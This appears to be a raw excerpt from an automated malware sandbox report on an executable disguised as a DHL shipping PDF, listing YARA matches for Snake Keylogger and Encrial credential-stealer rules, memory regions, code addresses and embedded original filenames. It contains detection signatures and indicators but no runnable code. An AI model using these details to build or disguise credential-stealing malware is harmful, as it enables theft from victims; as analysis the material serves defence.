Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_04F64210	0_2_04F64210
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_04F680D9	0_2_04F680D9
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05128E20	0_2_05128E20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05120C88	0_2_05120C88
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05128E11	0_2_05128E11
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05121638	0_2_05121638
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05121648	0_2_05121648
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05709B50	0_2_05709B50
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_0570AA18	0_2_0570AA18
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05705568	0_2_05705568
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_057055F0	0_2_057055F0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_057077D0	0_2_057077D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05707798	0_2_05707798
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_05704838	0_2_05704838
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_07026424	0_2_07026424
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_07026F88	0_2_07026F88
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072BE798	0_2_072BE798
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B47F0	0_2_072B47F0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B6300	0_2_072B6300
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072BD030	0_2_072BD030
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B5EC8	0_2_072B5EC8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B6D08	0_2_072B6D08
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B4C28	0_2_072B4C28
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B4C18	0_2_072B4C18
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 0_2_072B6CFB	0_2_072B6CFB
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D6C168	8_2_00D6C168
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D6CAB0	8_2_00D6CAB0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D62DD1	8_2_00D62DD1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D67E68	8_2_00D67E68
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D64F08	8_2_00D64F08
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D6B9DC	8_2_00D6B9DC
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D6B9E0	8_2_00D6B9E0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D6CAAE	8_2_00D6CAAE
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D64EF8	8_2_00D64EF8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_00D67E66	8_2_00D67E66
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F81C58	8_2_04F81C58
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F815F8	8_2_04F815F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F84500	8_2_04F84500
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F87770	8_2_04F87770
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F86998	8_2_04F86998
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E4D0	8_2_04F8E4D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E4C0	8_2_04F8E4C0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F80498	8_2_04F80498
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F89C90	8_2_04F89C90
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F80489	8_2_04F80489
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8BC80	8_2_04F8BC80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8BC71	8_2_04F8BC71
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F83C50	8_2_04F83C50
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F83C43	8_2_04F83C43
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8DC20	8_2_04F8DC20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8DC13	8_2_04F8DC13
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F815EA	8_2_04F815EA
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8CDE0	8_2_04F8CDE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8CDD7	8_2_04F8CDD7
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8ED80	8_2_04F8ED80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8ED70	8_2_04F8ED70
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F80D48	8_2_04F80D48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F80D39	8_2_04F80D39
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C530	8_2_04F8C530
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C520	8_2_04F8C520
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8A6C8	8_2_04F8A6C8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8A6B9	8_2_04F8A6B9
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8D690	8_2_04F8D690
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8D683	8_2_04F8D683
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8F630	8_2_04F8F630
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8F620	8_2_04F8F620
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F89E18	8_2_04F89E18
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F837F8	8_2_04F837F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F837E8	8_2_04F837E8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8AF78	8_2_04F8AF78
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8AF68	8_2_04F8AF68
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F82F48	8_2_04F82F48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F82F38	8_2_04F82F38
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F808F0	8_2_04F808F0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C0D8	8_2_04F8C0D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F808DF	8_2_04F808DF
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C0CF	8_2_04F8C0CF
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F840A8	8_2_04F840A8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F84098	8_2_04F84098
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E078	8_2_04F8E078
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E068	8_2_04F8E068
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F80040	8_2_04F80040
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8B828	8_2_04F8B828
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8B818	8_2_04F8B818
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8001E	8_2_04F8001E
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8F1D8	8_2_04F8F1D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8F1C8	8_2_04F8F1C8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F811A0	8_2_04F811A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C988	8_2_04F8C988
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8118F	8_2_04F8118F
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8C97B	8_2_04F8C97B
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E928	8_2_04F8E928
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8E923	8_2_04F8E923
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F82AF0	8_2_04F82AF0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F82AE0	8_2_04F82AE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8FA88	8_2_04F8FA88
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8FA78	8_2_04F8FA78
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8A270	8_2_04F8A270
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8A261	8_2_04F8A261
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8D238	8_2_04F8D238
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8B3D0	8_2_04F8B3D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8B3C1	8_2_04F8B3C1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F833A0	8_2_04F833A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F83393	8_2_04F83393
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F81B4A	8_2_04F81B4A
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8AB20	8_2_04F8AB20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 8_2_04F8AB10	8_2_04F8AB10
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_01854210	9_2_01854210
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_018580DA	9_2_018580DA
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_057C3860	9_2_057C3860
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_057C3850	9_2_057C3850
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07746424	9_2_07746424
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07746F88	9_2_07746F88
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A347F0	9_2_07A347F0
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A36300	9_2_07A36300
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A3C1F8	9_2_07A3C1F8
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A35EC8	9_2_07A35EC8
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A36D08	9_2_07A36D08
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A34C28	9_2_07A34C28
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A34C18	9_2_07A34C18
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_07A3D970	9_2_07A3D970
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_0164C168	13_2_0164C168
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_0164CA58	13_2_0164CA58
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_01644F08	13_2_01644F08
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_01647E68	13_2_01647E68
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_0164B9E0	13_2_0164B9E0
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_01642DD1	13_2_01642DD1
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_01647E59	13_2_01647E59
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_01644EF8	13_2_01644EF8
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C4048A	13_2_05C4048A
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C40498	13_2_05C40498
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C4268B	13_2_05C4268B
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C42698	13_2_05C42698
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C40040	13_2_05C40040
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C44000	13_2_05C44000
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C40013	13_2_05C40013
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C42CD3	13_2_05C42CD3
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C42CE0	13_2_05C42CE0
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C40B20	13_2_05C40B20
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C44AE3	13_2_05C44AE3
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C41610	13_2_05C41610
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C41620	13_2_05C41620
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C43321	13_2_05C43321
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C43330	13_2_05C43330
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C43FEF	13_2_05C43FEF
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C43980	13_2_05C43980
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 13_2_05C43977	13_2_05C43977

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: invalid certificate

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.972893252.0000000006DD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000000.924409174.00000000007DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameELRB.exeX vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.973824821.0000000008D10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.968515100.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.969436343.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.969436343.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2175341190.000000000041A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2175739841.00000000007F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Binary or memory string: OriginalFilenameELRB.exeX vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
